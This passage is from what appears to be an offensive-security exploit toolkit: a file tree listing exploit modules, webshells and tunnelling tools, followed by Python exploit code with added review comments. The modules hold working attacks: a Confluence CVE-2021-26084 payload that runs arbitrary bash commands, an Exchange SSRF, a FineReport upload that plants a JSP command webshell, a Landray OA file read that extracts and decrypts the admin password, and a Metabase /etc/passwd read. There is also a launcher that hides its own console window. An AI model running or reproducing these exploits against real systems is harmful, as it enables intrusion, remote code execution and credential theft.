├── ClassCongregation.py ├── CodeTest.bat ├── CodeTest.pyw ├── EXP ├── ALL.py ├── ApacheShiro.py ├── ApacheSolr.py ├── ApacheStruts2.py ├── ApacheTomcat.py ├── AtlassianConfluence.py ├── Exchange.py ├── FHAdmin.py ├── Fastjson.py ├── FineReport.py ├── LandrayOA.py ├── MetaBase.py ├── OracleWeblogic.py ├── PHPStudy.py ├── ThinkPHP.py ├── Tongda.py ├── WindowsSMBv3.py └── __init__.py ├── POC ├── ByPass403.py ├── ByWAF_Mysql.py ├── Editor_vul.py ├── FHAdmin.py ├── FOFA.py ├── Fastjson_RCE.py ├── Fckeditor.py ├── GetCMS.py ├── GoogleHacking.py ├── IIS_MS15-034_Range_bytes.py ├── IIS_shortname_Scan.py ├── JSFinder.py ├── JSencode.py ├── LinkFinder.py ├── Log4j-scan.py ├── Nginx_iis_scan.py ├── Redis_unauthorized_access.py ├── Scan_zip.py ├── Shiro_poc_DNS.py ├── SpringBootVulExploit.py ├── Struts2Scan.py ├── Swagger-exp.py ├── TPscan.py ├── ThinkAdmin.py ├── ThinkphpVersion.py ├── Thinkphp_5_0_23_rce.py ├── Thinkphp_5_rce_1.py ├── Tomcat_Ajp-lfi.py ├── Tomcat_http_put.py ├── Tongda_cookie_11_4.py ├── Tongda_rce_11_4.py ├── Tongda_v11_4_rce_getshell.py ├── URL_getTitle.py ├── Weaver-Ecology-OA_RCE-EXP.py ├── WeblogicScan.py ├── Weblogic_GIOP.py ├── Weblogic_T3.py ├── Weblogic_weakPass.py ├── __init__.py ├── js_examples │ ├── enpassword.js │ ├── md5.js │ └── top100password.txt ├── webshell_asp.py ├── webshell_aspx.py ├── webshell_aspx_D.py ├── webshell_jsp.py ├── webshell_php.py ├── webshell_php_D.py ├── xcdn.py └── 模板.py ├── Proxy ├── WebRequest.py ├── __init__.py ├── handler │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── configHandler.cpython-37.pyc │ │ ├── logHandler.cpython-37.pyc │ │ └── proxyHandler.cpython-37.pyc │ ├── configHandler.py │ ├── logHandler.py │ └── proxyHandler.py ├── helper │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-37.pyc │ │ ├── check.cpython-37.pyc │ │ ├── proxy.cpython-37.pyc │ │ └── validator.cpython-37.pyc │ ├── check.py │ ├── fetch.py │ ├── proxy.py │ └── validator.py ├── ips.txt ├── log │ ├── 
Apache Shiro │ └── test.log ├── proxyFetcher.py ├── proxySetting.py ├── sqlmap_auto_proxy.bat ├── sqlmap_auto_proxy.py └── util │ ├── __init__.py │ ├── lazyProperty.py │ ├── singleton.py │ └── six.py ├── README.md ├── Template ├── EXP.j2 ├── POC.j2 └── __init__.py ├── data ├── api-docs.json ├── bool_blind.xml ├── error.xml └── time_blind.xml ├── execScripts ├── Caidao_cmd.jsp ├── Caidao_shell.asp ├── Caidao_shell.aspx └── Caidao_shell.php ├── img ├── 1.png └── 2.png ├── lib ├── green.png ├── note.txt └── red.png ├── log └── info.txt ├── payload_html ├── Ueditor │ ├── Ueditor.html │ └── ueditor.png ├── chrome_payload.html ├── key.sh ├── kindeditor.html ├── npc ├── npc.exe ├── nps └── wget.exe ├── python.ico ├── requirements.txt ├── settings.py └── util ├── ExpRequest.py └── globalvar.py
/CodeTest.bat: --------------------------------------------------------------------------------
@echo off
REM Launcher. Without the "h" argument the script re-runs itself through
REM mshta/WScript.Shell with window style 0 (no visible console) and the "h"
REM marker, then exits; the second, hidden instance jumps straight to :begin.
if "%1" == "h" goto begin
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
REM -B: do not write .pyc files for the entry point.
python3 -B CodeTest.pyw
--------------------------------------------------------------------------------
/EXP/ALL.py: --------------------------------------------------------------------------------
import sys,importlib,glob,os,datetime
# NOTE(review): relative path; the EXP/ glob below likewise assumes the process
# is started from the repository root.
sys.path.append('../')
#from concurrent.futures import ThreadPoolExecutor,wait,as_completed,ALL_COMPLETED
from ClassCongregation import color

# Module objects for every EXP/*.py except this file and __init__, and their bare
# names (same index in both lists).  The imports happen when this module is
# imported, so any class-body side effects in those modules (e.g. tables printed
# at class-definition time) also run here.
vuln_scripts = []
exp_scripts = []
for _ in glob.glob('EXP/*.py'):
    script_name = os.path.basename(_).replace('.py', '')
    if script_name != 'ALL' and script_name != '__init__':
        vuln_name = importlib.import_module('.%s'%script_name,package='EXP')
        exp_scripts.append(script_name)
        vuln_scripts.append(vuln_name)

def check(**kwargs):
    """Run every EXP module's check() with kwargs and concatenate the results.

    Args:
        **kwargs: forwarded unchanged to each module's check(); 'url' must be
            present because it is read here for the banner line.

    Returns:
        The newline-joined strings returned by the module checks.  A module whose
        check() raises is reported in yellow and skipped, so its result is absent.
    """
    result = ''
    now = datetime.datetime.now()
    color ("["+str(now)[11:19]+"] " + "[+] Scanning target domain "+kwargs['url'], 'green')
    # Call each module in turn (sequential; the thread-pool variant is commented out below).
    for index in range(len(vuln_scripts)):
        try:
            result += vuln_scripts[index].check(**kwargs)+'\n'
        except Exception as e:
            # Broad catch on purpose: one broken module must not stop the sweep.
            now = datetime.datetime.now()
            color ("["+str(now)[11:19]+"] " + "[-] Running {} occured error!!!".format(exp_scripts[index]), 'yellow')
            continue
    return result
#executor = ThreadPoolExecutor(max_workers = 3)
#for data in executor.map(lambda kwargs: check(**kwargs),vuln_scripts):
#    pass
--------------------------------------------------------------------------------
/EXP/AtlassianConfluence.py: --------------------------------------------------------------------------------
from util.ExpRequest import ExpRequest,Output
from operator import methodcaller
import prettytable as pt
# Leftover header text (it names a Shiro CVE); the only check in this module is
# cve_2021_26084 below.
"""
cve_2016_4437 反序列化命令执行(可回显)
目标系统: windows、linux
"""
class AtlassianConfluence():
    """Atlassian Confluence checks: one method per POC, dispatched by check() below."""
    def __init__(self, **env):
        """
        Initialise the parameters shared by all POC methods from the env dict.

        timeout / retry_time / retry_interval are converted with int(), so they
        must be present and numeric.  'vuln' is compared with the string 'False'
        by the POC methods; any other value (including a missing key, which
        yields None) selects the non-verify branch.  win_cmd / linux_cmd carry
        the fixed marker default but are not referenced in this module.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.status = env.get('status')

    def cve_2021_26084(self):
        """CVE-2021-26084 check: POST an expression in queryString to the site root.

        Verify branch (self.vuln == 'False'): success is the fixed marker
        'aaa{class java.lang.String=null}bbb' in the response body, which also
        sets self.status = 'success'.  The other branch embeds self.cmd in the
        request and only reports; it never updates self.status.  Any exception
        is routed to output.error_output().
        """
        appName = 'Atlassian Confluence'   # appName / path / fofa are unused here (module template)
        pocname = 'cve_2021_26084'
        path = '/'
        method = 'post'
        desc = '<6.13.23, 6.14.0~7.4.11, 7.5.0~7.11.5, 7.12.0~7.12.5'   # affected-version ranges as recorded by the author
        fofa = 'Atlassian Confluence'
        # Output / ExpRequest come from util.ExpRequest (not shown here).
        output = Output(pocname)
        # Request wrapper.
        exprequest = ExpRequest(pocname, output)

        try:
            #_verify
            if self.vuln == 'False':
                paramsPost = {"queryString":"aaa\\u0027+\x23{\\u0022\\u0022[\\u0022class\\u0022]}+\\u0027bbb"}
                headers = {"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0","Content-Type":"application/x-www-form-urlencoded"}
                # NOTE(review): the request is sent to self.url, not self.url + path; retry/timeout settings are not passed.
                response = exprequest.post(self.url, data=paramsPost, headers=headers, verify=False)
                if "aaa{class java.lang.String=null}bbb" in response.text:
                    output.no_echo_success(method, desc)
                    self.status = 'success'
                else:
                    output.fail()

            #_attack
            else:
                paramsPost = {"queryString":"kkk\\u0027+\x23{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var x=new java.lang.ProcessBuilder;x.command([\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027" + self.cmd + "\\u0027]);x.start()\\u0022)}+\\u0027"}
                headers = {"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0","Content-Type":"application/x-www-form-urlencoded"}
                response = exprequest.post(self.url, data=paramsPost, headers=headers, verify=False)
                if "kkk{Process" in response.text:
                    output.no_echo_success(method, desc)
                else:
                    output.fail()
        except Exception as error:
            output.error_output(str(error))

    # NOTE(review): these statements run at class-definition time, i.e. on every
    # import of the module, and they bind 'tb' as a class attribute.  check()
    # below iterates dir(AtlassianConfluence) and calls every non-dunder name, so
    # in ALL mode 'tb' is invoked like a method and raises (a PrettyTable is not
    # callable), which aborts the loop before the result list is returned.
    tb = pt.PrettyTable()
    tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description']
    tb.align['Target type'] = 'l'
    tb.align['Vuln Name'] = 'l'
    tb.align['Impact Version && Vulnerability description'] = 'l'
    tb.add_row(["Atlassian Confluence", "cve_2021_26084", "body=\"Atlassian Confluence\" , [rce]"])
    print(tb)

def check(**kwargs):
    """Entry point used by EXP/ALL.py.

    With kwargs['pocname'] != 'ALL' the named method is called and its
    self.status is returned as-is.  With 'ALL' every non-dunder name in
    dir(AtlassianConfluence) is called via methodcaller, 'name -> status' is
    collected, and status is reset to 'fail' between calls; the joined list is
    returned.  Module-level bare strings around this function are not docstrings.
    """
    result_list = []
    result_list.append('----------------------------')
    ExpAtlassianConfluence = AtlassianConfluence(**kwargs)
    if kwargs['pocname'] != 'ALL':
        func = getattr(ExpAtlassianConfluence, kwargs['pocname'])# bound method looked up by name
        func()# run it
        return ExpAtlassianConfluence.status
    else:# run every POC method
        for func in dir(AtlassianConfluence):
            if not func.startswith("__"):
                methodcaller(func)(ExpAtlassianConfluence)
                result_list.append(func+' -> '+ExpAtlassianConfluence.status)
                ExpAtlassianConfluence.status = 'fail'
        result_list.append('----------------------------')
        return '\n'.join(result_list)

--------------------------------------------------------------------------------
/EXP/Exchange.py: --------------------------------------------------------------------------------
from util.ExpRequest import ExpRequest, Output
from ClassCongregation import Dnslog
from operator import methodcaller
# Module header (bare string, not a docstring): one SSRF check.
"""
Exchange_SSRF [ssrf]
"""
class Exchange():
    """Exchange checks: one method per POC, dispatched by check() below."""
    def __init__(self, **env):
        """
        Initialise the parameters shared by all POC methods from the env dict.

        timeout / retry_time / retry_interval must be present and numeric (int()).
        'vuln' is compared with the string 'False'; any other value, including a
        missing key, selects the non-verify branch.  win_cmd / linux_cmd are not
        used in this module.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.status = env.get('status')

    def Exchange_SSRF(self):
        """SSRF check via the X-AnonResource-Backend / X-BEResource cookie values.

        Verify branch (self.vuln == 'False'): a Dnslog host is placed in the
        cookie and success is decided by dnslog.result(), i.e. an out-of-band
        DNS callback, which also sets self.status = 'success'.  The other branch
        puts self.cmd into the cookie and prints the response body; it never
        updates self.status.
        """
        appName = 'Exchange:Exchange_SSRF'   # unused
        pocname = 'Exchange_SSRF'
        path = '/owa/auth/x.js'
        method = 'get'
        # NOTE(review): copy-paste leftover from another module; this is not a Tomcat check.
        desc = 'Apache Tomcat: Examples File'
        info = "[ssrf]"
        payload = ''
        cookie = 'X-AnonResource=true;X-AnonResource-Backend={}/ecp/default.flt?~3;X-BEResource={}/owa/auth/logon.aspx?~3;'
        # Output / ExpRequest come from util.ExpRequest (not shown here).
        output = Output(pocname)
        # Request wrapper.
        exprequest = ExpRequest(pocname, output)
        try:
            #_verify
            if self.vuln == 'False':
                dnslog = Dnslog()
                # dns_host() is called twice; whether both calls yield the same host depends on Dnslog (not shown) — confirm.
                exprequest.get(self.url + path, data=payload, headers={'Cookie':cookie.format(dnslog.dns_host(), dnslog.dns_host())}, timeout=self.timeout, verify=False)
                if dnslog.result():
                    output.echo_success(method, info)
                    self.status = 'success'
                else:
                    output.fail()
            #_attack
            else:
                request = exprequest.get(self.url + path, data=payload, headers={'Cookie':cookie.format(self.cmd, self.cmd)}, timeout=self.timeout, verify=False)
                print(request.text)
        except Exception as error:
            output.error_output(str(error))

def check(**kwargs):
    """Entry point used by EXP/ALL.py.

    With kwargs['pocname'] != "ALL" the named method is called and self.status
    is returned.  With "ALL" every non-dunder name in dir(Exchange) is called,
    'name -> status' lines are collected with status reset to 'fail' after each
    call, and the joined list is returned.
    """
    result_list = []
    result_list.append('----------------------------')
    ExpExchange = Exchange(**kwargs)
    if kwargs['pocname'] != "ALL":
        func = getattr(ExpExchange, kwargs['pocname'])# bound method looked up by name
        func()# run it
        return ExpExchange.status
    else:# run every POC method
        for func in dir(Exchange):
            if not func.startswith("__"):
                methodcaller(func)(ExpExchange)
                result_list.append(func+' -> '+ExpExchange.status)
                ExpExchange.status = 'fail'
        result_list.append('----------------------------')
        return '\n'.join(result_list)

--------------------------------------------------------------------------------
/EXP/FHAdmin.py: --------------------------------------------------------------------------------
from util.ExpRequest import ExpRequest,Output
from operator import methodcaller
# Template leftovers kept as an inert bare string (nothing below uses them).
"""
import util.globalvar as GlobalVar
from ClassCongregation import ysoserial_payload,Dnslog
DL = Dnslog()
DL.dns_host()
DL.result()
"""
class FHAdmin():
    """FHAdmin checks: one method per POC, dispatched by check() below."""
    def __init__(self, **env):
        """
        Initialise the parameters shared by all POC methods from the env dict.

        timeout / retry_time / retry_interval must be present and numeric (int()).
        'vuln' is compared with the string 'False'; any other value, including a
        missing key, selects the non-verify branch.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.status = env.get('status')

    def cve_20210824_upload(self):
        """Upload check against the uploadify endpoint (path-traversal style '/;/' prefix).

        Both branches send the same fixed multipart body.  Verify branch
        (self.vuln == 'False'): the literal '2021' in the response body counts
        as success (prints the body, sets self.status = 'success').  The other
        branch prints the resulting location followed by the request body.
        """
        appName = 'FHAdmin'   # unused
        pocname = 'cve_20210824_upload'
        path = '/;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/'
        method = 'post'
        desc = '[upload] 任意文件上传+shiro权限绕过'
        data = '--6aaf12c632ee6febfc354d1ba1bc914b\r\nContent-Disposition: form-data; name="imgFile"; filename="a5s_9y.jsp"\r\nContent-Type: application/octet-stream\r\n\r\n123\r\n--6aaf12c632ee6febfc354d1ba1bc914b--'
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 'Connection': 'close', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Content-Type': 'multipart/form-data; boundary=6aaf12c632ee6febfc354d1ba1bc914b'}
        # Output / ExpRequest come from util.ExpRequest (not shown here).
        output = Output(pocname)
        # Request wrapper.
        exprequest = ExpRequest(pocname, output)
        try:
            if self.vuln == 'False':
                r = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False)
                # NOTE(review): '2021' is a weak indicator (presumably a date in the returned name — confirm); it may stop matching on other dates.
                if r"2021" in r.text:
                    print(r.text)
                    self.status = 'success'
                    output.no_echo_success(method, desc)
                else:
                    output.fail()
            else:
                result = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text
                print(self.url+'/;/plugins/uploadify/'+result.strip('\r\n')+'\n\n'+data)
        except Exception as error:
            output.error_output(str(error))

def check(**kwargs):
    """Entry point used by EXP/ALL.py.

    With kwargs['pocname'] != 'ALL' the named method is called and self.status
    is returned.  With 'ALL' every non-dunder name in dir(FHAdmin) is called,
    'name -> status' lines are collected with status reset to 'fail' after each
    call, and the joined list is returned.
    """
    result_list = []
    result_list.append('----------------------------')
    ExpFHAdmin = FHAdmin(**kwargs)
    if kwargs['pocname'] != 'ALL':
        func = getattr(ExpFHAdmin, kwargs['pocname'])# bound method looked up by name
        func()# run it
        return ExpFHAdmin.status
    else:# run every POC method
        for func in dir(FHAdmin):
            if not func.startswith("__"):
                methodcaller(func)(ExpFHAdmin)
                result_list.append(func+' -> '+ExpFHAdmin.status)
                ExpFHAdmin.status = 'fail'
        result_list.append('----------------------------')
        return '\n'.join(result_list)

--------------------------------------------------------------------------------
/EXP/FineReport.py: --------------------------------------------------------------------------------
from util.ExpRequest import ExpRequest,Output
from ClassCongregation import random_name
from operator import methodcaller
import re   # NOTE(review): unused in this module
# Module header (bare string, not a docstring): one upload check; 'vuln'
# defaults to None, which is not 'False' and so selects the non-verify branch.
"""
--FineReport--
CVE_20210408 [upload],默认self.vuln = None
"""
class FineReport():
    """FineReport checks: one method per POC, dispatched by check() below."""
    def __init__(self, **env):
        """
        Initialise the parameters shared by all POC methods from the env dict.

        timeout / retry_time / retry_interval must be present and numeric (int()).
        'vuln' is compared with the string 'False'; any other value, including a
        missing key, selects the non-verify branch.  win_cmd / linux_cmd are not
        used in this module.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.status = env.get('status')

    def CVE_20210408_FineReport(self):
        """Upload check through the svginit/design_save_svg ReportServer action.

        A random 6-character .jsp name is appended to the traversal path.  Verify
        branch (self.vuln == 'False'): writes the fixed marker, then fetches
        /WebReport/<name> and treats the marker in that body as success
        (self.status = 'success').  The other branch writes the payload and only
        prints the URL; it never updates self.status.
        """
        appName = 'FineReport'   # unused
        pocname = 'CVE_20210408'
        method = 'post'
        desc = 'FineReport:CVE_20210408'   # unused
        info = '[upload]'
        path = r'/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/'
        payload_verify = r'{"__CONTENT__":"VuLnEcHoPoCSuCCeSS","__CHARSET__":"UTF-8"}'
        payload = r'{"__CONTENT__":"<%Runtime.getRuntime().exec(request.getParameter(\"cmd\"));%>","__CHARSET__":"UTF-8"}'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0',
            'Connection': 'close',
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Content-Type': 'text/xml;charset=UTF-8',
            'Accept-Au': '0c42b2f264071be0507acea1876c74'   # fixed non-standard header value; its meaning is not shown here
        }
        # Output / ExpRequest come from util.ExpRequest (not shown here).
        output = Output(pocname)
        # Request wrapper.
        exprequest = ExpRequest(pocname, output)
        name = random_name(6)+'.jsp'
        path += name
        try:
            #_verify
            if self.vuln == 'False':
                # The first response is discarded; only the follow-up GET is inspected.
                request = exprequest.post(self.url + path, data=payload_verify, headers=headers, timeout=self.timeout, verify=False)
                request = exprequest.get(self.url + '/WebReport/' + name, headers=headers, timeout=self.timeout, verify=False)
                if 'VuLnEcHoPoCSuCCeSS' in request.text:
                    output.echo_success(method, info)
                    self.status = 'success'
                else:
                    output.fail()
            #_attack
            else:
                request = exprequest.post(self.url + path, data=payload, headers=headers, timeout=self.timeout, verify=False)
                print(self.url + path)
        except Exception as error:
            output.error_output(str(error))

def check(**kwargs):
    """Entry point used by EXP/ALL.py.

    With kwargs['pocname'] != 'ALL' the named method is called and self.status
    is returned.  With 'ALL' every non-dunder name in dir(FineReport) is called,
    'name -> status' lines are collected with status reset to 'fail' after each
    call, and the joined list is returned.
    """
    result_list = []
    result_list.append('----------------------------')
    ExpFineReport = FineReport(**kwargs)
    if kwargs['pocname'] != 'ALL':
        func = getattr(ExpFineReport, kwargs['pocname'])# bound method looked up by name
        func()# run it
        return ExpFineReport.status
    else:# run every POC method
        for func in dir(FineReport):
            if not func.startswith("__"):
                methodcaller(func)(ExpFineReport)
                result_list.append(func+' -> '+ExpFineReport.status)
                ExpFineReport.status = 'fail'
        result_list.append('----------------------------')
        return '\n'.join(result_list)

--------------------------------------------------------------------------------
/EXP/LandrayOA.py: --------------------------------------------------------------------------------
from util.ExpRequest import ExpRequest,Output
from ClassCongregation import des_dec
from operator import methodcaller
import prettytable as pt
import re
# Template leftovers kept as an inert bare string (nothing below uses them).
"""
import util.globalvar as GlobalVar
from ClassCongregation import ysoserial_payload,Dnslog
DL = Dnslog()
DL.dns_host()
DL.result()
"""
class LandrayOA():
    """Landray OA checks: one method per POC, dispatched by check() below."""
    def __init__(self, **env):
        """
        Initialise the parameters shared by all POC methods from the env dict.

        timeout / retry_time / retry_interval must be present and numeric (int()).
        'vuln' is compared with the string 'False'; any other value, including a
        missing key, selects the non-verify branch.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.status = env.get('status')

    def cve_custom_filereading(self):
        """File-read check via custom.jsp, targeting admin.properties.

        Verify branch (self.vuln == 'False'): the literal 'password' in the
        response body counts as success (self.status = 'success').  The other
        branch extracts the 'password = ...' value with a regex, decrypts it
        with des_dec and the first 8 characters of 'kmssAdminKey', and prints
        the admin login URL and password.  A non-matching regex raises
        AttributeError on .group(1); the broad except reports it via
        output.error_output().
        """
        appName = 'LandrayOA'   # unused
        pocname = 'cve_custom_filereading'
        path = '/sys/ui/extend/varkind/custom.jsp'
        method = 'post'
        desc = '[file reading] app="Landray-OA系统"'
        data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 'Connection': 'close', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'}
        # Output / ExpRequest come from util.ExpRequest (not shown here).
        output = Output(pocname)
        # Request wrapper.
        exprequest = ExpRequest(pocname, output)
        try:
            if self.vuln == 'False':
                r = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False)
                if r"password" in r.text:
                    self.status = 'success'
                    output.no_echo_success(method, desc)
                else:
                    output.fail()
            else:
                result = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text
                pwd = re.search(r'password = (.*)\\r', result).group(1)
                # Only the first 8 characters of the default key are used (presumably because des_dec takes an 8-byte key — confirm in ClassCongregation).
                pwd = des_dec(pwd, 'kmssAdminKey'[0:8])
                print('[+]登录地址: %s ,登录密码: %s'%(self.url+'/admin.do',pwd))
        except Exception as error:
            output.error_output(str(error))

    # NOTE(review): runs at class-definition time (on import) and binds 'tb' as a
    # class attribute, so check() in ALL mode calls it like a method and raises,
    # aborting the loop before the result list is returned.
    tb = pt.PrettyTable()
    tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description']
    tb.align['Target type'] = 'l'
    tb.align['Vuln Name'] = 'l'
    tb.align['Impact Version && Vulnerability description'] = 'l'
    tb.add_row([
        "LandrayOA",
        "cve_custom_filereading",
        "[file reading] app=\"Landray-OA系统\""
    ])
    print(tb)

def check(**kwargs):
    """Entry point used by EXP/ALL.py.

    With kwargs['pocname'] != 'ALL' the named method is called and self.status
    is returned.  With 'ALL' every non-dunder name in dir(LandrayOA) is called,
    'name -> status' lines are collected with status reset to 'fail' after each
    call, and the joined list is returned.
    """
    result_list = []
    result_list.append('----------------------------')
    ExpLandrayOA = LandrayOA(**kwargs)
    if kwargs['pocname'] != 'ALL':
        func = getattr(ExpLandrayOA, kwargs['pocname'])# bound method looked up by name
        func()# run it
        return ExpLandrayOA.status
    else:# run every POC method
        for func in dir(LandrayOA):
            if not func.startswith("__"):
                methodcaller(func)(ExpLandrayOA)
                result_list.append(func+' -> '+ExpLandrayOA.status)
                ExpLandrayOA.status = 'fail'
        result_list.append('----------------------------')
        return '\n'.join(result_list)

--------------------------------------------------------------------------------
/EXP/MetaBase.py: --------------------------------------------------------------------------------
from util.ExpRequest import ExpRequest,Output
from operator import methodcaller
import prettytable as pt
# Template leftovers kept as an inert bare string (nothing below uses them).
"""
import util.globalvar as GlobalVar
from ClassCongregation import ysoserial_payload,Dnslog
DL = Dnslog()
DL.dns_host()
DL.result()
"""
class MetaBase():
    """Metabase checks: one method per POC, dispatched by check() below."""
    def __init__(self, **env):
        """
        Initialise the parameters shared by all POC methods from the env dict.

        timeout / retry_time / retry_interval must be present and numeric (int()).
        'vuln' is compared with the string 'False'; any other value, including a
        missing key, selects the non-verify branch.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.status = env.get('status')

    def cve_MetaBase_20211123(self):
        """File-read check via the /api/geojson url parameter (file: scheme).

        Both branches send the same GET.  Verify branch (self.vuln == 'False'):
        the literal 'root:x' in the response body counts as success
        (self.status = 'success').  The other branch prints the body.
        """
        appName = 'MetaBase'   # unused
        pocname = 'cve_MetaBase_20211123'
        path = '/api/geojson?url=file:/etc/passswd'
        method = 'get'
        desc = '[file reading] metabase version >= 1.0.0, < 1.40.5'   # affected range as recorded by the author
        data = ''
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 'Connection': 'close', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*'}
        # Output / ExpRequest come from util.ExpRequest (not shown here).
        output = Output(pocname)
        # Request wrapper.
        exprequest = ExpRequest(pocname, output)
        try:
            if self.vuln == 'False':
                r = exprequest.get(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False)
                if r"root:x" in r.text:
                    self.status = 'success'
                    output.no_echo_success(method, desc)
                else:
                    output.fail()
            else:
                result = exprequest.get(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text
                print(result)
        except Exception as error:
            output.error_output(str(error))

    # NOTE(review): runs at class-definition time (on import) and binds 'tb' as a
    # class attribute, so check() in ALL mode calls it like a method and raises,
    # aborting the loop before the result list is returned.
    tb = pt.PrettyTable()
    tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description']
    tb.align['Target type'] = 'l'
    tb.align['Vuln Name'] = 'l'
    tb.align['Impact Version && Vulnerability description'] = 'l'
    tb.add_row([
        "MetaBase",
        "cve_MetaBase_20211123",
        "[file reading] metabase version >= 1.0.0, < 1.40.5"
    ])
    print(tb)

def check(**kwargs):
    """Entry point used by EXP/ALL.py.

    With kwargs['pocname'] != 'ALL' the named method is called and self.status
    is returned.  With 'ALL' every non-dunder name in dir(MetaBase) is called
    and 'name -> status' entries collected with status reset to 'fail' after
    each call.  NOTE(review): unlike the sibling modules this joins with '' and
    strips newlines, so the separators and entries run together on one line.
    """
    result_list = []
    result_list.append('----------------------------')
    ExpMetaBase = MetaBase(**kwargs)
    if kwargs['pocname'] != 'ALL':
        func = getattr(ExpMetaBase, kwargs['pocname'])# bound method looked up by name
        func()# run it
        return ExpMetaBase.status
    else:# run every POC method
        for func in dir(MetaBase):
            if not func.startswith("__"):
                methodcaller(func)(ExpMetaBase)
                result_list.append(func+' -> '+ExpMetaBase.status)
                ExpMetaBase.status = 'fail'
        result_list.append('----------------------------')
        return ''.join(result_list).strip('\n')
--------------------------------------------------------------------------------
/EXP/PHPStudy.py: --------------------------------------------------------------------------------
from util.ExpRequest import ExpRequest,Output
from operator import methodcaller
from ClassCongregation import Dnslog# detection via an out-of-band Dnslog callback
import base64
import time
class PHPStudy():
    """phpStudy checks: one method per POC, dispatched by check() below."""
    def __init__(self, **env):
        """
        Initialise the parameters shared by all POC methods from the env dict.

        timeout / retry_time / retry_interval must be present and numeric (int()).
        'vuln' is stored but not consulted by the methods in this module; each
        of them runs a single fixed probe.  win_cmd / linux_cmd are unused here.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
